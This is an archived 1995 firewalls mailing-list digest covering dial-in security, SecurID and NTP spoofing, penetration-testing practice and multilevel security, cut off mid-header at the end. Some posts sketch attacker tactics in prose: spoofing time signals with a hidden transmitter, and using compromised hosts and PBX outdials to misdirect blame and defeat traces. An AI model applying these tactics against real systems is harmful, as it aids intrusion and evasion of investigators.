From firewalls-owner Tue Aug 1 00:00:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA17739 for firewalls-outgoing; Mon, 31 Jul 1995 23:19:21 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA23931 for ; Mon, 31 Jul 1995 18:12:38 -0700 Received: from aba.nsrc.nus.sg(137.132.15.2) by miles via smap (V1.3) id sma023888; Mon Jul 31 18:11:56 1995 Received: from salome.nsrc.nus.sg by aba.nsrc.nus.sg (5.0/SMI-SVR4) id AA05326; Tue, 1 Aug 95 09:16:33 SST Received: by salome.nsrc.nus.sg (940816.SGI.8.6.9/940406.SGI.AUTO) for firewalls@greatcircle.com id JAA27224; Tue, 1 Aug 1995 09:00:39 -0700 From: waiming@salome.nsrc.nus.sg (Leong Wai Ming) Message-Id: <199508011600.JAA27224@salome.nsrc.nus.sg> Subject: Help: Secure data for dial-in To: firewalls@greatcircle.com Date: Tue, 1 Aug 1995 09:00:38 -0700 (PDT) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 610 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I'm new to this mailing list. Please pardon me if someone has asked the same question before. The situation is like this : Site A (not on internet) wants to connect to site B (on internet) and runs jobs there. But the data must be secured from site A to site B. Site B has a firewall. May I know what is the best way to do it ? Is using dial-in good enough ? How do I ensure site A's data would not 'leak' to the internet on the way to site B. (This is assuming that the security system on site B is good enough for intruders). Please advice. Thank you. Regards, Wai Ming email: waiming@nsrc.nus.sg From firewalls-owner Tue Aug 1 02:01:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA21456 for firewalls-outgoing; Tue, 1 Aug 1995 01:42:56 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA21448 for ; Tue, 1 Aug 1995 01:42:52 -0700 Received: from gmap15.leeds.ac.uk(129.11.84.200) by miles via smap (V1.3) id sma021446; Tue Aug 1 01:42:08 1995 Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.6.12/8.6.9) with ESMTP id JAA01833 for ; Tue, 1 Aug 1995 09:36:33 +0100 Received: from gmap.leeds.ac.uk (gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id JAA04768 for ; Tue, 1 Aug 1995 09:40:57 +0100 From: Danny Cox Date: Tue, 1 Aug 1995 09:38:13 +0100 Message-Id: <1567.9508010838@gmap.leeds.ac.uk> To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V4 #453 X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The SMG (if that's what you're referring to) is a case in > point. Give me one of the current SMGs and I can configure it to > run TCP/IP over Email, and do NFS into and out of a classified > environment. I believe this little loophole is being fixed but the > whole problem is one of those "emperors new clothes" type deals. > If you allow ANY large amounts of data in or out, I can run IP > over it. Period. All you can do is make it slow and expensive. The > long and short of the story is that it's a wasted effort. If the > data needs to be absolutely secure: isolate it. > mjr. > The notion of this bothers me. I don't understand it either which doesn't help! :) How can one run TCP/IP over email ? Given a sendmail setup, using smtp etc it's running via TCP/IP anyway. Could you explain a bit more please? Thanks, Danny From firewalls-owner Tue Aug 1 04:02:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA24244 for firewalls-outgoing; Tue, 1 Aug 1995 03:46:27 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA24228 for ; Tue, 1 Aug 1995 03:46:22 -0700 Received: from office.demon.net(193.195.224.1) by miles via smap (V1.3) id sma024181; Tue Aug 1 03:45:35 1995 Received: from demon.demon.co.uk by office.demon.net id aa24344; 1 Aug 95 11:17 +0100 Received: from hands.demon.co.uk by demon.demon.co.uk id aa10473; 1 Aug 95 11:16 BST Received: (from uucp@localhost) by hands.hands.com (8.6.9/8.6.9) id KAA01855; Tue, 1 Aug 1995 10:51:38 +0100 Message-Id: <199508010951.KAA01855@hands.hands.com> Received: from localhost(127.0.0.1) by hands.hands.com via smap (V1.3) id sma001841; Tue Aug 1 10:51:15 1995 X-Mailer: exmh version 1.6.2 7/18/95 To: "Thomas V. Myers" cc: Hal Lockhart , amoss@cs.huji.ac.il, firewalls@greatcircle.com Subject: Re: Secure-ID & NTP vulerabilities In-reply-to: Your message of "Mon, 31 Jul 1995 20:15:50 EDT." <199508010115.VAA08957@koicdu24.icdc.delcoelect.com> Mime-Version: 1.0 Content-Type: text/plain Date: Tue, 01 Aug 1995 10:51:14 +0200 From: Phil Hands Sender: firewalls-owner@GreatCircle.COM Precedence: bulk tvmyers@icdc.delcoelect.com said: > It would seem especially far fetched in light of the number of > amateur radio (HAM) operators who could pinpoint the location of the > 'bogus' transmitter in a few hours (or less) and would probably enjoy > doing it! The FCC could do the same job, of course! ;-) A > transmitter strong enough to completely mask the real signal would > show up like a search light at midnight to any reasonably competent > triangulation team. Let's say you have the aerial for your time receiver on the roof of your 10 story office building. If I can get a transmitter within 3 meters of your aerial, then at ground level (30 meters away) the signal strength will be 1/100 that required to beat the real time signal --- this is likely to be getting towards the level of background noise (i.e. becoming un-detectable). You could probably make the transmitter the size of a cigarette packet (trailing a wire as an aerial), and catapult it onto the roof. Alternatively, a van in the car park, with a directional aerial pointed up at the receiver would probably also be fairly un-detectable. The details are a bit vague, but you can see what I'm getting at --- I don't think that you can blithely assume that it is impossible to do this unnoticed. Cheers, Phil. From firewalls-owner Tue Aug 1 05:00:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA26756 for firewalls-outgoing; Tue, 1 Aug 1995 04:58:02 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA26739 for ; Tue, 1 Aug 1995 04:58:00 -0700 Received: from northshore.ecosoft.com(192.233.85.129) by miles via smap (V1.3) id sma026734; Tue Aug 1 04:57:42 1995 Received: from [198.115.179.217] (slip-3-17.shore.net) by northshore.ecosoft.com with SMTP id AB29389 (5.67a/IDA-1.5 for ); Tue, 1 Aug 1995 07:56:26 -0400 Message-Id: <199508011156.AB29389@northshore.ecosoft.com> Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Date: Tue, 1 Aug 1995 07:58:15 -0500 To: firewalls@greatcircle.com From: vin@shore.net (Vin McLellan) Subject: Re: Secure- ID and NTP vulnerabilities Cc: root@garrison.com, scott@zorch.sf-bay.org, hal@locus.com, Quentin.Fennessy@sematech.org, tvmyers@icdc.delcoelect.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jeromie Jackson queried the List-ocracy: =84 I would be interested in hearing comments from anyone in regards = to =84 what Secure-ID has done to make sure NTP spoofing does not cause =84 denial-of-service attacks on their authentication boxes. Obviously if t= he =84 time of the box gets moved forward or backward enough the keys & the =84 authentication unit will fall out of sync & deny access. A suggestion by Ches and smb (in The Book) that a NTP spoof/playback attack against "a time-based authentication device" (the patented basis for SecurID) could subvert the authenticator has established a FT sinecure in Security Dynamic's Customer Service Dept. It's like an endowed chair. Mr. Jackson and others here were savvy enough to postulate a denial of service attack (a serious matter; but not a penetration.) Less-informed folk often presume that the SecurID has no defenses against timely manipulation. Point of Info: SDI's core defense against time-spoof/playback lies in a secured and encrypted file of incoming SecurID card-codes and Greenwich time written as each authentication call is received. A specific card-code is not accepted a second time, period. Any SecurID authentication calls (which carry an internal time-stamp) must display a Greenwich time-stamp later than, and properly sequential to, any previous call from that particular card. Over the last six months, SDI has been niggled by a swarm of false rumors that an ACE/SecurID system was subverted and penetrated with time-spoof/playback in the nasty GE hacker attack last November. A security sage at Creative Strategies Research actually published this rumor as scriptural fact earlier this year -- but it's just not true, says GE. Point of Info2: There has never been a credible report of an ACE/SecurID system being subverted and penetrated. There were no ACE authentication modules in the chain of systems the Thanksgiving Day hackers penetrated at GE. The several GE nets protected by ACE/SecurID user authentication were untouched. GE knows of no connection between the attack and any remote ACE/SecurID site. GE is buying more ACE/Servers. As to Mr. Jackson's query: NTP is a total non-issue for that half of the SDI installed base which still use stand-alone ACE "authentication boxes" in hardware. The ACE hardware boxes have an internal clock, which is not dependent on any outside time source after it is initialized by SDI in pre-ship prep. These boxes ship with a program which adjusts for drift in the internal clock, as measured by SDI in the initialization process. Each ACE module also has code which allows it to record, calculate -- and adjust for -- any relative drift in the time-clock circuit of each SecurID card it authenticates. Remember: the ACE module only has to remain synchronized with the SecurIDs which call upon it; not the outside world -- and management of that sync is the heart of the patents which keep time-based two-factor authentication "tokens" an SDI monopoly. In the most rapidly growing sector of SDI's business -- the SecurID client/server authentication apps SDI has shipped without competition for four years -- the risk of denial-of-service NTP attacks is real if minimal. And there are obvious solutions if, and when, it is considered a realistic threat. Point of Info3: No version of ACE (hardware box or ACE/Server) requires NTP. The ACE/Server can depend quite comfortably upon its host's system clock, unsupported by NTP. Again, the time-sync that counts -- the relationship between the authentication server, and the population of SecurIDs that call upon it -- is whole unto itself. At SDI corporate, the ACE/Server hosts just don't bother with NTP. Alternatively, as someone noted, you could set up an independent radio time-source (something SDI corporate is just getting around to.) At sites where a CPU is dedicated to supporting an ACE authentication server, ignoring NTP is the painless solution. For sites which _must_ run NTP on the CPU which hosts the ACE/Server in order to support some specific service, there remains a potential for the denial of service attack Mr. Jackson cited, spoofing upstream NTP servers to corrupt the NTP feed (thus, boosting the ACE/Server's clock out of synch with the clocks in its SecurID population.) And, yes, as a couple imaginative folks noted, a pirate radio could potentially spoof radio time signals, albiet in a scenario far-fetched off silver screen. So we go to an atomic clock? =84 As stated in the FW&Inet security book, there is a cryptographic =84 authentication mechanism for NTP, but there is still the vulerabilitiy =84 of the upstream servers being attacked. At SDI, there is a feeling that spoofing a modern cryptographically-authenticated NTP feed is more difficult than has been suggested -- particularly if your NTP is set up to accept time only from specified and selected sources on the Net. (See "Protecting the Protectors," in The Book.) But it is not always easy to identify a trusted source, or to track back a chain of authenticated NTP demons, to guarantee a valid source at the genesis -- so with NTP, some risk (of denial of service, not penetration) exists, however diminished by careful and deliberate SysAdmin. Yet, as noted, alternative and secure set-up options exist, and they are not especially burdensome or expensive. Mr. Jackson added: =84 Does Secure-ID have some statement/document referencing this =84 vulnerability? I would be interested in seeing it. I'm working on it. Consider this a draft;-) SDI has hired the Privacy Guild to develop resource materials for their planned Website. This will be one of the questions addressed in the SecurID FAQ we are developing. (Suggestions for additional Qs to be addressed in the FAQ would be very welcome. Pls e-mail.) Mark Verber jumped in to toss a few jabs at = SDI: > Security Dynamics does nothing to assure your clock is correct. If your > time is compromised via NTP you are hosed. It is true that the integrity and security of the CPU that hosts the authentication server is the responsibility of the SysAdmin, rather that SDI. But again, ACE "boxes" can't use NTP; and ACE/Servers don't need NTP. The ACE/Server is designed to limit the repercussions of a less than totally secure set-up to denial of service. For years, SDI engineers have toyed with the idea of a secure software clock integral to the ACE/Server code, but the spoof threat has not been deemed serious enough to warrant such an extension. Denial of service is the universal risk. Acts of God; a Luddite employee; or a squirrel on the power line could knock you off-line. Worry about it all, of course -- not least, some error buried among the thousand variables in system and network set-ups -- but realistically, threats have to be ranked for proportional and rational countermeasures. SDI's feeling is: There are easier ways to knock most systems off the Net than by NTP spoofing. Even if someone has illicitly gained root on the machine that hosts a ACE/Server, messing with the system clock is a torturously round-about way of disabling SecurID access, when crashing your system does it neatly. > If fact, not only to you create an immediate denial of service, but you > also create a hassle for any user who tried to authenticate while the time > was off because those account are marked to require the next login to do > a double verify, eg they have to send the current card display, and then > the next display of the card as soon as it rolls over. This is a bother..= From firewalls-owner Tue Aug 1 05:37:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA26882 for firewalls-outgoing; Tue, 1 Aug 1995 05:01:06 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA26852 for ; Tue, 1 Aug 1995 05:01:00 -0700 Received: from hawksbill.sprintmrn.com(199.11.1.3) by miles via smap (V1.3) id sma026842; Tue Aug 1 05:00:43 1995 Received: by hawksbill.sprintmrn.com (5.65/1.34) id AA00684; Tue, 1 Aug 95 07:59:32 -0500 From: paul@hawksbill.sprintmrn.com (Paul Ferguson) Message-Id: <9508011259.AA00684@hawksbill.sprintmrn.com> Subject: Re: I open my big mouth... proxies for Oracle? To: fwoyach@cais.cais.com (Frederick Woyach) Date: Tue, 1 Aug 1995 07:59:32 -0500 (EST) Cc: Firewalls@GreatCircle.COM In-Reply-To: from "Frederick Woyach" at Jul 31, 95 09:56:43 pm X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 623 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > >You'll need to remember to allow xdmcp (udp/177), if the X terminals are > >initially logging into an X server located on the 'internal' network, > >however I would imagine that it would be preferable to keep any xdmcp > >traffic external. > > > UDP?? > Yep. - paul _______________________________________________________________________________ Paul Ferguson US Sprint tel: 703.689.6828 Managed Network Engineering internet: paul@hawk.sprintmrn.com Reston, Virginia USA http://www.sprintmrn.com From firewalls-owner Tue Aug 1 07:00:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA29099 for firewalls-outgoing; Tue, 1 Aug 1995 06:30:20 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA29075 for ; Tue, 1 Aug 1995 06:30:16 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma029063; Tue Aug 1 06:29:53 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA12264; Tue, 1 Aug 95 09:09:55 -0400 Date: Tue, 1 Aug 95 09:09:55 -0400 Message-Id: <9508011309.AA12264@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Sidewinder Challenge Sender: firewalls-owner@GreatCircle.COM Precedence: bulk mjr rites: > Rather than see "take a blindfolded shot at the system" >firewalls tests, I'd rather see: "here is a detail of our design, >take it and study the exact configuration you will be attacking >and come back in a week with testing tools" approach. Anything >else is security through obscurity, and hopefully we've learned >that that's not very good. I agree with Marcus with the additional comment: periodically I get requests from people to "try to break into system xxxx and see if it is secure". I always refuse (maybe why haven't not been promoted in ten years), not because there are any doubts that it can be done, but because Things May Get Broken in the process. The right way is to first studdy the system in question off line: the network configuration, the ACLs, the design rules. Once a good understanding of the concept is made, then study the policies involved (what ? you don't have any ? Then what am I testing ? - always have a sample set when you say this BTW). Next examine the perimeter for "leaks" - conduct a modem sweep. Call the phone company and ask about leased lines. Sweep the network for unknown nodes (have *never* seen a paper list that was up-to-date - have even found entire unlisted subnets). At this point you should not have to do any penetration testing, you should be able to predict all vulnerabilities. Of course you are going to need to demonstrate them since no-one will believe you but there should not be any element of doubt, you should know. However, while the Sidewinder challenge is somewhat flawed technically, it is good marketing particularly when the target is people with money who know little/nothing about firewalls. You could have the best product in the world but it will fail in the marketplace without effective marketing and I would rather see the sales go to a product with potential like Sidewinder from an in-depth company than to a one-trick-pony with a glossy GUI as happened in the anti-virus market. But then what would I know, am not particularly sucessful. Warmly, Padgett From firewalls-owner Tue Aug 1 08:26:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA29785 for firewalls-outgoing; Tue, 1 Aug 1995 07:04:20 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA29777 for ; Tue, 1 Aug 1995 07:04:18 -0700 From: Mark_W_Loveless@smtp.bnr.com Received: from vulcan.iss.bnr.com(139.51.128.1) by miles via smap (V1.3) id sma029774; Tue Aug 1 07:03:43 1995 Received: from smtp.bnr.com by vulcan.iss.bnr.com (4.1/BNR/v1.0/910819) id AA29705; Tue, 1 Aug 95 09:01:38 CDT Received: from cc:Mail by smtp.bnr.com id AA807292894; Tue, 01 Aug 95 08:58:34 CST Date: Tue, 01 Aug 95 08:58:34 CST Message-Id: <9507018072.AA807292894@smtp.bnr.com> To: Mark Allyn (206) 860-9454 Cc: firewalls@GreatCircle.COM Subject: Re[2]: Someone knocking at our door... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A one-sies/two-sies thing is a great cover. Here's what I mean: >From first.compromised.com "poke around" victim.com. Monitor first.compromised.com's admin mail, and see if the one-sies/two-sies additude is working. >From second.compromised.com "poke around" victim.com, while performing a serious attack from third.compromised.com, making sure second.compromised.com gets any blame in log files. Minor screw-ups in the serious attack that leave traces will get blamed on the "poke around guy. You waste your time telling postmaster@second.compromised.com about victim.com's problems, especially if you receive a note stating "yes, we've found the guy, can you send log files, etc., and how he got it so we can see what he did and press charges". Do you know how many people have sent this info? Now the hacker learns a little more about your site, and more for the next victim. The whois is where you should start, and possibly CERT immediately after. Traceroute is okay, but an outdial or two especially through a compromised PBX will cover that AND a quick phone trace. NEVER assume anything. Call me paranoid if you will... Mark ______________________________ Reply Separator _________________________________ Subject: Re: Someone knocking at our door... Author: Mark Allyn (206) 860-9454 at internet Date: 7/29/95 11:57 PM I would wait and see if they do it again. I tend to ignore the one-sies and two-sies. They are not worth it. It was probably someone just poking around. If they do persist, first send email to postmaster@whatever.com. If they are still at it after that, look up whatever.com at whois on the Internic. Call the techinical or administrative contact listed. Try to reason it out with them. Ninety percent of the time, that would lick it. If you are still frustrated at this point, do a traceroute to their IP address and attempt to identify the routers immediately before their net. Those routers are probably those of their upstream provider. Look up that name and or IP address on Internic. Email/call the administrative contacts for the upstream provider. Complain that one of their downstream sites is causing you trouble. While you are at it, send a copy of your complaint to your own upstream provider. This way, they might go to bat for you (their customer) if the problems continue. Mark Allyn allyn@allyn.com http://mark.allyn.com From firewalls-owner Tue Aug 1 08:33:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA29768 for firewalls-outgoing; Tue, 1 Aug 1995 07:02:20 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA29760 for ; Tue, 1 Aug 1995 07:02:18 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma029747; Tue Aug 1 07:01:30 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA12364; Tue, 1 Aug 95 09:32:03 -0400 Date: Tue, 1 Aug 95 09:32:02 -0400 Message-Id: <9508011332.AA12364@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Multilevel systems Sender: firewalls-owner@GreatCircle.COM Precedence: bulk mjr rites again: > This is indeed the classical view of distributed system security: > 1) All data is important to some degree or another > 2) All data should be separated from all other data > to some degree or another > 3) Most organizations don't separate their data at all > Conclusion: therefore they are wrong > Corollary: therefore they should use multilevel systems ... > Conclusion: multilevel security systems suck ... > That's a *PEOPLE* problem, not a software or hardware >problem. Throwing multilevel security in isn't going to help that >one bit. It's just a tool. Is a superb posting but Marcus make one oversimplification - he seems to imply that multilevel security must be enforced at a single point and that there is nothing between single level (everybody trusts everyone) and multilevel (lots of compartments). I believe that there is a simpler but more effective effective scenario - distributed bilevel. Once upon a time, every computer had a team of mystic gurus assigned to it for protection and it worked (mostly). Today we have thousands of computing elements that are much more difficult to control at that level. However the real points of separation remain, just are not at the nodes. "Blem wit" the current thinking is that the points of control are not at the firewall (at least in conventional thinking) either. Back then the first computer in a corporation was used for finance and then personel. Engineers did not have access, they had calculators and slide rules (still have mine 8*). Then engineers and secretaries started having computer access but the engineers used VAXes and the secretaries used PROFS so there was still a separation. It took years before anyone bothered to make ASCII-EBCDIC conversion a reality and then it was limited to JCL/TSO functions. Our problem today is that suddently we have put finance and engineering and executives and *everybody* into one big pot called "Enterprise". And are having problems such as Engineers looking at salaries in HR. Haquers get a lot of press but while a threat, are not a big one. Trouble is that firewalls are a good answer to the outside threat but a *lousy* one for the inside problem. Multilevel separation is an inside answer but the firewall is not a good place to apply it. Instead the finance department needs its own simple firewall between it and the rest of the enterprise. Treated as a subnet and with the filter at the bridge is easy. Traffic is lower than on the net itself so does not impact. Since the concern is just inside1 vs inside2, the rules do not need to be complex. A distributed answer based on rules established by the department/ project is the right answer. And this is a *different* set of rules than are on the main firewall, a second layer of defense for sensitive areas, simple to apply and simple to maintain. Not single point multilevel but distributed bilevel. Warmly, Padgett From firewalls-owner Tue Aug 1 09:23:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA01154 for firewalls-outgoing; Tue, 1 Aug 1995 08:06:25 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA01118 for ; Tue, 1 Aug 1995 08:06:19 -0700 Received: from aix.moraine.cc.il.us(192.217.159.2) by miles via smap (V1.3) id sma001107; Tue Aug 1 08:05:30 1995 Received: from moraine.cc.il.us by aix.moraine.cc.il.us (AIX 4.1/UCB 5.64/4.03) id AA06722; Tue, 1 Aug 1995 10:06:37 -0500 Received: from cc:Mail by moraine.cc.il.us id AA807210209; Mon, 01 Aug 95 10:03:27 CST Date: Mon, 01 Aug 95 10:03:27 CST From: "Bierdz, Philip" Encoding: 33 Text Message-Id: <9506318072.AA807210209@moraine.cc.il.us> To: peter@nmti.com, Rick Murphy Cc: firewalls@greatcircle.com Subject: Re[2]: Someone knocking at our door... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Subject: Re: Someone knocking at our door... On 7/30/95 @ 8:39 PM Rick Murphy said: >Unless you're desperate to meet new friends on the net (or to find new >people whom you can annoy :-) there's little point in notifying anyone of >the attempt. If it's persistent, however, it's worth notifying the owner of >the site. >If you're going to involve a postmaster in a suspected breakin attempt, >you need a lot more evidence than a single probe - otherwise, you're >wasting their time. If you're going to report it, at least give enough >information to be useful to the site administrator - otherwise, you'll likely >be ignored. >-Rick I don't believe so. I'd contact the postmaster anyway (if you feel it was a valid probe). Being a postmaster myself, I'd like to know if a user was suspect of such a thing from any site. If I got enough calls from other sites with the same user as being "suspect"... I thing we all get the point. ---------------------------------------------------------------------- Philip J. Bierdz ||||||||||||||||||||||||||||||||||| Senior Systems Support Specialist |============DISCLAIMER============ Moraine Valley Community College | My opinions are not necessarily Palos Hills, IL - USA | my own but those of my employer |================================== bierdz@moraine.cc.il.us ||||||||||||||||||||||||||||||||||| ---------------------------------------------------------------------- From firewalls-owner Tue Aug 1 09:31:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA02036 for firewalls-outgoing; Tue, 1 Aug 1995 08:43:24 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA02006 for ; Tue, 1 Aug 1995 08:43:19 -0700 Received: from larry.infi.net(198.22.1.114) by miles via smap (V1.3) id sma001997; Tue Aug 1 08:43:03 1995 Received: from cspc13.unos.org by larry.infi.net with SMTP (Infinet-S-3.2) id LAA19090; Tue, 1 Aug 1995 11:42:59 -0400 Date: Tue, 1 Aug 95 11:41:09 EST From: "Kurt S. Plowman" Subject: Re: silly, but???????? To: firewalls@greatcircle.com X-Mailer: Chameleon - TCP/IP for Windows by NetManage, Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >It was a security programmer that wrote the guardian.. This may make >people think that all people that write security software (of which >a firewall would driectly translate to the same application) put backdoors >in so that they can get access later.. > > Looks like another reason for access to the source code. :) From firewalls-owner Tue Aug 1 10:06:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03173 for firewalls-outgoing; Tue, 1 Aug 1995 09:20:25 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03158 for ; Tue, 1 Aug 1995 09:20:22 -0700 From: garys@baker.ds.boeing.com Received: from atc.boeing.com(130.42.28.80) by miles via smap (V1.3) id sma003135; Tue Aug 1 09:19:22 1995 Received: by atc.boeing.com (5.65/splinter.boeing.com) id AA27117; Tue, 1 Aug 1995 09:21:19 -0700 Received: from (baker.ds.boeing.com) by splinter.boeing.com with SMTP (1.37.109.14/16.2) id AA206913768; Tue, 1 Aug 1995 09:16:08 -0700 Received: by baker2.ds.boeing.com (5.x/SMI-SVR4) id AA13726; Tue, 1 Aug 1995 09:19:24 -0700 Date: Tue, 1 Aug 1995 09:19:24 -0700 Message-Id: <9508011619.AA13726@baker2.ds.boeing.com> To: firewalls@greatcircle.com Subject: "trusted" firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk 1. "Trusted" products and systems. It seems that this term "trusted" carries STRONG emotional content! Let's try for the moment to place emotion aside and also to differentiate between the following: a. TCSEC (Orange book) evaluation classes (C2, B1, B2, etc) and b. A computer product that inspires confidence that it does what the vendors claims it does and that it is hard for me to make it do something it is not supposed to do. 2. There are a number of reasons why TCSEC 'trusted' products are not selling like hot-cakes. That fact bears _no_ relation on whether there is a need for "trustworthy" computer products - especially in the area of firewall functionality. 3. "Trusted" is NOT equal to Multi-level security (MLS). MLS capability is a function and a system can inspire confidence without having MLS functionality. 4. The technology exists to produce "trustworthy" systems - and this technology wasn't new ten years ago. It is called software engineering - modularity, layering, data hiding, well defined interfaces, etc. The problem is that most software development appears to ignore basic software engineering principles, or does not apply them with enough rigor to provide any significant "trust". The result is that we get very functional products with a never ending string of security holes. 5. We are getting hung up on words (like trusted and MLS) and not seeing potential areas of agreement. Consider this example from the 94 Federal Criteria workshop. In one of the small groups we discussed commercial computer security needs. The representatives of a number of firms were in _strong_ agreement that there is NO need for labels. A few minutes later, these same individuals were in just as strong agreement that security "tags" are a definite need! "Label", "tag" - just different names for the same thing. Cheers, Gary Gary R. Stoneburner Boeing Information and Support Services PHONE: 206-865-5603 P.O. Box 24346, MS 7L-15 FAX: 206-865-6903 Seattle, WA 98124-0346 EMAIL: garys@baker.ds.boeing.com The opinions represented herein are not necessarily those of Boeing. From firewalls-owner Tue Aug 1 10:08:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03656 for firewalls-outgoing; Tue, 1 Aug 1995 09:29:49 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03620 for ; Tue, 1 Aug 1995 09:29:42 -0700 Received: from explorer.csc.com(20.1.10.27) by miles via smap (V1.3) id sma003571; Tue Aug 1 09:29:20 1995 Received: by csc.com (Smail3.1.29.1 #1) id m0sdKB3-000iS9C; Tue, 1 Aug 95 12:28 EDT Date: Tue, 1 Aug 1995 12:28:21 -0400 (EDT) From: Adam Safier To: Warren Moore cc: firewalls-digest Subject: Re: Dial-in for Windows '95 In-Reply-To: <9507271435.AA1006@notes> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Uh, excuse the dumb question, but in all seriousness why have an "insecure > Network modem/terminal server" in the first place? Modem-pool dialin > protection devices (e.g., Security Dynamics, Microframe, etc.) have been around > forever, the majority work really well, support all sorts of advanced > authentication devices, are reasonably priced, and allow asynch, sync, Dos, > Unix, or whatever to be used. If it's a question of budget, I understand, but > while cheap is good, proven is better. It's a problem of having selected the low cost provider on a "bid" that had no security requirements - several years ago. i.e. the equipment chosen on the bid and put in place in several places is circa 1990 and low cost at that time. We already told the customer these modem servers did not have adequate security and a replacement should be evaluated. The client doesn't have an adequate security policy in place yet so simply throwing new "security" boxes at them could also be a big waste of tax dollars and not meet real needs. For now we need to work with what we have in the field. (A security policy and architecture etc. are in development.) Adam My statements reflect my personal opinion which is not shared by my employer, wives, children.... or Freud. From firewalls-owner Tue Aug 1 11:40:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA04488 for firewalls-outgoing; Tue, 1 Aug 1995 09:51:04 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA04469 for ; Tue, 1 Aug 1995 09:51:01 -0700 Received: from uuneo.neosoft.com(198.64.84.252) by miles via smap (V1.3) id sma004463; Tue Aug 1 09:50:47 1995 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id LAA04927 for GreatCircle.COM!firewalls; Tue, 1 Aug 1995 11:44:28 -0500 Received: by ris1.nmti.com (smail2.5) id AA22930; 1 Aug 95 09:54:09 CDT (Tue) Received: by sonic.nmti.com; id AA27493; Tue, 1 Aug 1995 10:19:01 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9508011519.AA27493@sonic.nmti.com.nmti.com> Subject: Re: Using miltilevel systems for firewalls To: kaplan@bpa.arizona.edu (Ray Kaplan) Date: Tue, 1 Aug 1995 10:19:01 -0500 (CDT) Cc: firewalls@GreatCircle.COM, peter@nmti.com In-Reply-To: from "Ray Kaplan" at Jul 31, 95 01:22:39 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 389 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Yep. At the risk of sounding like I'm niave, I wonder if we (vendors, > users, consultants....) come up with some deffinitive work that helps us > get past the biggest obsiticles: explaing to management why they are at > risk and what they have do do about it? I just pass around Cheswick's paper on Berferd. It's a pretty good convincer. I almost never have to pull out Cuckoo's Egg. From firewalls-owner Tue Aug 1 11:41:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA04785 for 